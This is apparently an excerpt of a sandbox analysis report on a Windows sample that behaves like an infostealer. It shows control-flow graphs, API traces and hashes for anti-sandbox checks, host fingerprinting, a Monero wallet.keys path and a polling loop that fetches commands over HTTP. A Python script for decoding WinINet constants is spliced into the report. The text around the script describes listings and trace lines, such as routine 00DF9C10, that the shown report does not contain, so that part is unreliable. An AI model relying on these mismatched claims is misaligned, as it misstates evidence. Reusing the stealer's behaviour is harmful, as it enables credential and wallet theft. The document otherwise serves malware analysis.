                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 8e9e0743910a3d33717a23bdabf3c96daf14cdd263b32ed0241b2c60cccd9770
                              • Instruction ID: 1c1396881dc5a29f1796552c325ceb53f4bb05f02d59090231888332d3f92d02
                              • Opcode Fuzzy Hash: 8e9e0743910a3d33717a23bdabf3c96daf14cdd263b32ed0241b2c60cccd9770
                              • Instruction Fuzzy Hash: 4062EBB5700200EFC774DFA8EA8895637F9F78C601734856AE68AC3A4CDE7F94419B64

                              Control-flow Graph
                              control_flow_graph 1033 de6280-de630b call dfa7a0 call de47b0 call dfa740 InternetOpenA StrCmpCA 1040 de630d 1033->1040 1041 de6314-de6318 1033->1041 1040->1041 1042 de631e-de6342 InternetConnectA 1041->1042 1043 de6509-de6525 call dfa7a0 call dfa800 * 2 1041->1043 1044 de64ff-de6503 InternetCloseHandle 1042->1044 1045 de6348-de634c 1042->1045 1063 de6528-de652d 1043->1063 1044->1043 1047 de634e-de6358 1045->1047 1048 de635a 1045->1048 1050 de6364-de6392 HttpOpenRequestA 1047->1050 1048->1050 1052 de6398-de639c 1050->1052 1053 de64f5-de64f9 InternetCloseHandle 1050->1053 1055 de639e-de63bf InternetSetOptionA 1052->1055 1056 de63c5-de6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1044 1055->1056 1058 de642c-de644b call df8940 1056->1058 1059 de6407-de6427 call dfa740 call dfa800 * 2 1056->1059 1066 de644d-de6454 1058->1066 1067 de64c9-de64e9 call dfa740 call dfa800 * 2 1058->1067 1059->1063 1069 de6456-de6480 InternetReadFile 1066->1069 1070 de64c7-de64ef InternetCloseHandle 1066->1070 1067->1063 1074 de648b 1069->1074 1075 de6482-de6489 1069->1075 1070->1053 1074->1070 1075->1074 1079 de648d-de64c5 call dfa9b0 call dfa8a0 call dfa800 1075->1079 1079->1069
                              APIs
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                                • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • InternetOpenA.WININET(00E00DFE,00000001,00000000,00000000,00000000), ref: 00DE62E1
                              • StrCmpCA.SHLWAPI(?,0197F1D8), ref: 00DE6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0197E7B8,00000000,00000000,00400100,00000000), ref: 00DE6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DE63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00DE63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00DE646D
                              • InternetCloseHandle.WININET(00000000), ref: 00DE64EF
                              • InternetCloseHandle.WININET(00000000), ref: 00DE64F9
                              • InternetCloseHandle.WININET(00000000), ref: 00DE6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 5dbca39a9fa2713259220d54424f2716dda93f29b04b5490c9a32137f210105f
                              • Instruction ID: c4e25dc5e626ccaaeef8ee908d7d73391957562af22dd71b523369095b4d0dfc
                              • Opcode Fuzzy Hash: 5dbca39a9fa2713259220d54424f2716dda93f29b04b5490c9a32137f210105f
                              • Instruction Fuzzy Hash: D0715C71A00218EBDB24EFA4CC49BEE7774FB44700F108199F20A6B5C4DBB5AA85CF61

                              Control-flow Graph
                              control_flow_graph 1090 df5510-df5577 call df5ad0 call dfa820 * 3 call dfa740 * 4 1106 df557c-df5583 1090->1106 1107 df55d7-df564c call dfa740 * 2 call de1590 call df52c0 call dfa8a0 call dfa800 call dfaad0 StrCmpCA 1106->1107 1108 df5585-df55b6 call dfa820 call dfa7a0 call de1590 call df51f0 1106->1108 1134 df5693-df56a9 call dfaad0 StrCmpCA 1107->1134 1138 df564e-df568e call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1107->1138 1124 df55bb-df55d2 call dfa8a0 call dfa800 1108->1124 1124->1134 1139 df56af-df56b6 1134->1139 1140 df57dc-df5844 call dfa8a0 call dfa820 * 2 call de1670 call dfa800 * 4 call df6560 call de1550 1134->1140 1138->1134 1142 df56bc-df56c3 1139->1142 1143 df57da-df585f call dfaad0 StrCmpCA 1139->1143 1269 df5ac3-df5ac6 1140->1269 1146 df571e-df5793 call dfa740 * 2 call de1590 call df52c0 call dfa8a0 call dfa800 call dfaad0 StrCmpCA 1142->1146 1147 df56c5-df5719 call dfa820 call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1142->1147 1162 df5865-df586c 1143->1162 1163 df5991-df59f9 call dfa8a0 call dfa820 * 2 call de1670 call dfa800 * 4 call df6560 call de1550 1143->1163 1146->1143 1246 df5795-df57d5 call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1146->1246 1147->1143 1168 df598f-df5a14 call dfaad0 StrCmpCA 1162->1168 1169 df5872-df5879 1162->1169 1163->1269 1198 df5a28-df5a91 call dfa8a0 call dfa820 * 2 call de1670 call dfa800 * 4 call df6560 call de1550 1168->1198 1199 df5a16-df5a21 Sleep 1168->1199 1176 df587b-df58ce call dfa820 call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1169->1176 1177 df58d3-df5948 call dfa740 * 2 call de1590 call df52c0 call dfa8a0 call dfa800 call dfaad0 StrCmpCA 1169->1177 1176->1168 1177->1168 1274 df594a-df598a call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1177->1274 1198->1269 1199->1106 1246->1143 1274->1168
                              APIs
                                • Part of subcall function 00DFA820: lstrlen.KERNEL32(00DE4F05,?,?,00DE4F05,00E00DDE), ref: 00DFA82B
                                • Part of subcall function 00DFA820: lstrcpy.KERNEL32(00E00DDE,00000000), ref: 00DFA885
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5857
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DF51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5228
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DF52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5318
                                • Part of subcall function 00DF52C0: lstrlen.KERNEL32(00000000), ref: 00DF532F
                                • Part of subcall function 00DF52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00DF5364
                                • Part of subcall function 00DF52C0: lstrlen.KERNEL32(00000000), ref: 00DF5383
                                • Part of subcall function 00DF52C0: lstrlen.KERNEL32(00000000), ref: 00DF53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00DF5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: b712b122a781439edc6029e59d3e38e020eb6bc23938944723ff429ef7620f2c
                              • Instruction ID: 79af92956f0381449e2139ff272c78e3fc5ff461b28310a9926fea7baac6b2a0
                              • Opcode Fuzzy Hash: b712b122a781439edc6029e59d3e38e020eb6bc23938944723ff429ef7620f2c
                              • Instruction Fuzzy Hash: 73E152B1A1020C9ACB14FBA4E852EFD7378EF54340F51C118B64A67495EF75AB09CBB2
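The three API listings above (the import-resolution routine at 00DF9C10 with its LoadLibraryA/GetProcAddress chains, the WinINet request routine at 00DE6280, and the polling loop at 00DF5510 with its Sleep call) show raw argument values that are easier to read once the WinINet constants are named. The Python script below is an added example and is not part of the Joe Sandbox report or of the sample: it parses trace lines in the format printed above, names the constants behind the HTTP call arguments (access type, service, HttpOpenRequestA flags, InternetSetOptionA option, HttpQueryInfoA level, read-buffer size, Sleep interval) and groups the GetProcAddress calls by module handle, separating the two names the sandbox rendered as text (InternetSetOptionA, HttpQueryInfoA) from the ones it shows only as a pointer. The embedded trace is a subset of the lines quoted above, copied verbatim; the constant values come from wininet.h. The report does not say which DLL each module handle belongs to, so the script does not guess that mapping.

```python
import re
from collections import defaultdict

# Constructed sample: a verbatim subset of the API trace lines quoted in the
# report above (the full trace contains many more GetProcAddress calls).
SAMPLE_TRACE = """\
GetProcAddress.KERNEL32(75900000,01965E08), ref: 00DF9C2D
GetProcAddress.KERNEL32(75900000,01965AC8), ref: 00DF9C45
LoadLibraryA.KERNEL32(0197C7E8,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA03D
GetProcAddress.KERNEL32(75FD0000,01965948), ref: 00DFA0DA
GetProcAddress.KERNEL32(6F060000,01965848), ref: 00DFA530
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00DFA5F1
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00DFA607
InternetOpenA.WININET(00E00DFE,00000001,00000000,00000000,00000000), ref: 00DE62E1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE6335
HttpOpenRequestA.WININET(00000000,GET,?,0197E7B8,00000000,00000000,00400100,00000000), ref: 00DE6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DE63BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE63D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00DE63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00DE646D
Sleep.KERNEL32(0000EA60), ref: 00DF5A1B
"""

# One trace line: Api.MODULE(arg,arg,...), ref: ADDRESS
LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")  # how the sandbox prints an unresolved pointer

# WinINet constants (values from wininet.h).
HTTP_OPEN_FLAGS = {
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x80000000: "INTERNET_FLAG_RELOAD",
}
ACCESS_TYPES = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICES = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
SET_OPTIONS = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
QUERY_LEVELS = {19: "HTTP_QUERY_STATUS_CODE"}


def parse_trace(text):
    """Turn trace lines into dicts; lines that do not match the format are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            calls.append({"api": m["api"], "mod": m["mod"], "args": m["args"].split(","), "ref": m["ref"]})
    return calls


def decode_flags(value, table):
    """Name every known bit in value; report leftover bits instead of dropping them."""
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append("0x%08X (unknown bits)" % (value & ~known))
    return names


def decode_call(call):
    """Return {argument index: meaning} for the arguments this decoder understands."""
    api, args = call["api"], call["args"]
    num = lambda i: int(args[i], 16)
    out = {}
    try:
        if api == "InternetOpenA":
            out[1] = ACCESS_TYPES.get(num(1), "access type %d" % num(1))
        elif api == "InternetConnectA":
            out[5] = SERVICES.get(num(5), "service %d" % num(5))
        elif api == "HttpOpenRequestA":
            out[6] = " | ".join(decode_flags(num(6), HTTP_OPEN_FLAGS))
        elif api == "InternetSetOptionA":
            out[1] = SET_OPTIONS.get(num(1), "option %d" % num(1))
        elif api == "HttpQueryInfoA":
            out[1] = QUERY_LEVELS.get(num(1), "info level %d" % num(1))
        elif api == "InternetReadFile":
            out[2] = "%d-byte read buffer" % num(2)
        elif api == "Sleep":
            out[0] = "%d ms (%.0f s)" % (num(0), num(0) / 1000)
    except ValueError:
        pass  # the argument was printed as '?' or as a string, nothing numeric to decode
    return out


def decode_trace(text):
    """Parse a trace and attach the decoded arguments to every call."""
    return [dict(call, decoded=decode_call(call)) for call in parse_trace(text)]


def decoded_by_api(text):
    """First decoded argument set per API name, for quick lookups."""
    result = {}
    for call in decode_trace(text):
        if call["decoded"] and call["api"] not in result:
            result[call["api"]] = call["decoded"]
    return result


def summarize_resolution(calls):
    """Count LoadLibraryA calls and group GetProcAddress calls by module handle,
    keeping the export names the sandbox printed in clear."""
    per_module = defaultdict(lambda: {"total": 0, "plaintext": []})
    loads = 0
    for c in calls:
        if c["api"] == "LoadLibraryA":
            loads += 1
        elif c["api"] == "GetProcAddress":
            entry = per_module[c["args"][0]]
            entry["total"] += 1
            if not HEX8_RE.match(c["args"][1]):
                entry["plaintext"].append(c["args"][1])
    return loads, dict(per_module)


if __name__ == "__main__":
    for call in decode_trace(SAMPLE_TRACE):
        if call["decoded"]:
            meaning = "; ".join("arg%d=%s" % (i, v) for i, v in sorted(call["decoded"].items()))
            print("%s @ %s: %s" % (call["api"], call["ref"], meaning))
    loads, per_module = summarize_resolution(parse_trace(SAMPLE_TRACE))
    print("LoadLibraryA calls: %d" % loads)
    for handle, info in per_module.items():
        print("module %s: %d GetProcAddress calls, names in clear: %s"
              % (handle, info["total"], info["plaintext"] or "none"))
```

Run as-is, the script reports that the request is opened with INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_KEEP_CONNECTION, that InternetSetOptionA sets INTERNET_OPTION_SECURITY_FLAGS, that HttpQueryInfoA reads HTTP_QUERY_STATUS_CODE, that the read loop uses a 1999-byte buffer, and that the polling loop sleeps 60 s between rounds. Feed it the full listing from the report to get the per-module GetProcAddress counts for all thirteen module handles.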

                              Control-flow Graph
                              control_flow_graph 1301 df17a0-df17cd call dfaad0 StrCmpCA 1304 df17cf-df17d1 ExitProcess 1301->1304 1305 df17d7-df17f1 call dfaad0 1301->1305 1309 df17f4-df17f8 1305->1309 1310 df17fe-df1811 1309->1310 1311 df19c2-df19cd call dfa800 1309->1311 1313 df199e-df19bd 1310->1313 1314 df1817-df181a 1310->1314 1313->1309 1316 df187f-df1890 StrCmpCA 1314->1316 1317 df185d-df186e StrCmpCA 1314->1317 1318 df1835-df1844 call dfa820 1314->1318 1319 df1913-df1924 StrCmpCA 1314->1319 1320 df1932-df1943 StrCmpCA 1314->1320 1321 df18f1-df1902 StrCmpCA 1314->1321 1322 df1951-df1962 StrCmpCA 1314->1322 1323 df1970-df1981 StrCmpCA 1314->1323 1324 df18cf-df18e0 StrCmpCA 1314->1324 1325 df198f-df1999 call dfa820 1314->1325 1326 df18ad-df18be StrCmpCA 1314->1326 1327 df1849-df1858 call dfa820 1314->1327 1328 df1821-df1830 call dfa820 1314->1328 1344 df189e-df18a1 1316->1344 1345 df1892-df189c 1316->1345 1342 df187a 1317->1342 1343 df1870-df1873 1317->1343 1318->1313 1329 df1926-df1929 1319->1329 1330 df1930 1319->1330 1331 df194f 1320->1331 1332 df1945-df1948 1320->1332 1350 df190e 1321->1350 1351 df1904-df1907 1321->1351 1333 df196e 1322->1333 1334 df1964-df1967 1322->1334 1336 df198d 1323->1336 1337 df1983-df1986 1323->1337 1348 df18ec 1324->1348 1349 df18e2-df18e5 1324->1349 1325->1313 1346 df18ca 1326->1346 1347 df18c0-df18c3 1326->1347 1327->1313 1328->1313 1329->1330 1330->1313 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 df18a8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00DF17C5
                              • ExitProcess.KERNEL32 ref: 00DF17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 1f3ae50dd402ea53d8de7ad95aa4cbb9135a3c797a8d13a577d4e856b4bee3cb
                              • Instruction ID: 7f3a76cbdcbfbd7ee6994f8fae8b7fef20b6b699fc5b7e032d56ca3bc2000275
                              • Opcode Fuzzy Hash: 1f3ae50dd402ea53d8de7ad95aa4cbb9135a3c797a8d13a577d4e856b4bee3cb
                              • Instruction Fuzzy Hash: 1A5169B8A0020EEFCB14DFA0D994BBE77B5BF44304F118048E656A7280DBB5E941DBB1

                              Control-flow Graph (rendered graph for the function at 00DF7500 not reproduced; legend: Executed / Not Executed)
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00DF7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DF757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF760A
                              • wsprintfA.USER32 ref: 00DF7640
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\$
                              • API String ID: 1544550907-3109660283
                              • Opcode ID: 7d4365eeb78933c8df5f8a52d880a949324614c7aa3465016a80854f3f623f26
                              • Instruction ID: cdabdd32e80fdc169ca3c38babd1a08124cef8cf971b5f57c8e4d8ff896cfc50
                              • Opcode Fuzzy Hash: 7d4365eeb78933c8df5f8a52d880a949324614c7aa3465016a80854f3f623f26
                              • Instruction Fuzzy Hash: 3A4161B1904248EBDB20DF94DC45BEEB7B4EF08704F144199F609A7284DB79AA44CBB5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,019706C0), ref: 00DF98A1
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,019704F8), ref: 00DF98BA
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01970420), ref: 00DF98D2
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,019705D0), ref: 00DF98EA
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,019705E8), ref: 00DF9903
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01978970), ref: 00DF991B
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01965C48), ref: 00DF9933
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01965C68), ref: 00DF994C
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01970438), ref: 00DF9964
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01970450), ref: 00DF997C
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01970498), ref: 00DF9995
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,019704B0), ref: 00DF99AD
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01965B28), ref: 00DF99C5
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01970510), ref: 00DF99DE
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DE11D0: ExitProcess.KERNEL32 ref: 00DE1211
                                • Part of subcall function 00DE1160: GetSystemInfo.KERNEL32(?), ref: 00DE116A
                                • Part of subcall function 00DE1160: ExitProcess.KERNEL32 ref: 00DE117E
                                • Part of subcall function 00DE1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00DE112B
                                • Part of subcall function 00DE1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00DE1132
                                • Part of subcall function 00DE1110: ExitProcess.KERNEL32 ref: 00DE1143
                                • Part of subcall function 00DE1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00DE123E
                                • Part of subcall function 00DE1220: ExitProcess.KERNEL32 ref: 00DE1294
                                • Part of subcall function 00DF6770: GetUserDefaultLangID.KERNEL32 ref: 00DF6774
                                • Part of subcall function 00DE1190: ExitProcess.KERNEL32 ref: 00DE11C6
                                • Part of subcall function 00DF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DE11B7), ref: 00DF7880
                                • Part of subcall function 00DF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7887
                                • Part of subcall function 00DF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DF789F
                                • Part of subcall function 00DF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7910
                                • Part of subcall function 00DF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7917
                                • Part of subcall function 00DF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00DF792F
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,019789F0,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DF6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00DF6AF9
                              • Sleep.KERNEL32(00001770), ref: 00DF6B04
                              • CloseHandle.KERNEL32(?,00000000,?,019789F0,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6B1A
                              • ExitProcess.KERNEL32 ref: 00DF6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: 5b4e27818a69aa005a35e791c877479305493ca5731c881276e699cbdef3d54d
                              • Instruction ID: 0a1bc0551e240922864c0483e7bac509a0741df9ddf694739a3975680913dea2
                              • Opcode Fuzzy Hash: 5b4e27818a69aa005a35e791c877479305493ca5731c881276e699cbdef3d54d
